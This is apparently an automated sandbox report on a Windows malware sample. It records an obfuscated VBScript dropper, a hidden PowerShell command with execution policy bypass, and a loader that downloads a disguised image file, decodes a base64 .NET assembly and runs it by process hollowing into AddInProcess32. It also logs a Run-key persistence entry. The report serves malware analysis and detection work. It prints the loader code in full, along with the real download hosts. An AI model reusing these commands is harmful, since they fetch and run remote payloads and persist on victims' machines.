          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Source: Binary string: System.Data.Linq.pdb source: powershell.exe, 00000005.00000002.1593249339.0000021C89401000.00000004.00000800.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.CreateObject("WScript.Shell") posteridade = ("$perpetuadoralagoanodigalagoano = '") & berlinense & "'" posteridade = posteridade & ";$alagoanoWjuxd = [oxyosmiayoxyosmiatoutorgadamentem.Toutorgadamentext.outorgadamentenperpetuadoroding]::Uniperpetuadorodoutorgadamente.GoutorgadamentetString(" posteridade = posteridade & "[oxyosmiayoxyosmia" posteridade = posteridade & "toutorgadamente" posteridade = posteridade & "m.perpetuadoralagoano" posteridade = posteridade & "nvoutorgadamenter" posteridade = posteridade & "t]:" posteridade = posteridade & ":Fralagoano" posteridade = posteridade & "mbaoxyosmia" posteridade = posteridade & "outorgadamente64oxyosmiatring( $perpetuador" posteridade = posteridade & "alagoanod" posteridade = posteridade & "igalagoano.routorgadamente" posteridade = posteridade & "desoxygenarla" posteridade = posteridade & "perpetuadoroutorgadamente('" posteridade = posteridade & "DgTroutorgadamente" posteridade = posteridade & "','" posteridade = posteridade & "A" posteridade = posteridade & "') ))" posteridade = posteridade & ";desoxygenaralagoanoweroxyosmiahell.outorgadamentexoutorgadamente -windowoxyosmiatyloutorgadamente hiddoutorgadamenten -outorgadamentexoutorgadamentecutiondesoxygenarolicy bydesoxygenarasoxyosmia -Nodesoxygenarrofiloutorgadamente -command $OWjuxD" posteridade = Replace(posteridade,"desoxygenar","p") posteridade = Replace(posteridade,"perpetuador","c") posteridade = Replace(posteridade,"outorgadamente","e") posteridade = Replace(posteridade,"alagoano","o") posteridade = Replace(posteridade,"oxyosmia","s") dionina1 = "desoxygenaralagoanoweroxyosmiahell -perpetuadoralagoanommand " dionina1 = Replace(dionina1,"perpetuador","c") dionina1 = Replace(dionina1,"oxyosmia","s") dionina1 = Replace(dionina1,"alagoano","o") dionina1 = Replace(dionina1,"desoxygenar","p") dionina = dionina1 & """" & posteridade & """" Cama.Run dionina, 0, False IServerXMLHTTPRequest2.open("GET", "https://paste.ee/d/3dasY", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.CreateObject("WScript.Shell");IWshShell3.Run("powershell -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreC", "0", "false")
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDkDgTreODgTreDgTrevDgTreDDgTreDgTreMQDgTrezDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDgDgTreMgDgTre4DgTreDQDgTreMQDgTrezDgTreDgDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDkDgTreODgTreDgTrevDgTreDDgTreDgTreMQDgTrezDgTreC8DgTreb
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDkDgTreODgTreDgTrevDgTreDDgTreDgTreMQDgTrezDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDgDgTreMgDgTre4DgTreDQDgTreMQDgTrezDgTreDgDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138', 'https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunPE.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.drows/17.93.321.39//:ptth' , '1' , '\\tsclient\C\Program Files\' , 'aburrar','AddInProcess32',''))} }"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDkDgTreODgTreDgTrevDgTreDDgTreDgTreMQDgTrezDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDgDgTreMgDgTre4DgTreDQDgTreMQDgTrezDgTreDgDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138', 'https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunPE.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.drows/17.93.321.39//:ptth' , '1' , '\\tsclient\C\Program Files\' , 'aburrar','AddInProcess32',''))} }"Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_01699808 push esp; iretd 9_2_01699809
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_065D3400 pushfd ; ret 9_2_065D3401
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_065D3388 push esp; ret 9_2_065D3389
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_066FF6A3 pushfd ; iretd 9_2_066FF6A9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_066FF1D3 push eax; retf 9_2_066FF1D9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_067035B8 push esp; retf 0643h9_2_067035C5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_067F06F0 push eax; iretd 9_2_067F06F9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_067F4378 pushfd ; iretd 9_2_067F4385
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_067FD861 push C0065C6Fh; iretd 9_2_067FD86D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_06836192 push eax; iretd 9_2_06836199
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_0684A780 pushfd ; ret 9_2_0684A78D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_0684A2F8 push esp; ret 9_2_0684A305
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_0684A329 pushad ; ret 9_2_0684A335

          Boot Survival

          barindex
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Path \\tsclient\C\Program Files\aburrar.vbsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PathJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PathJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
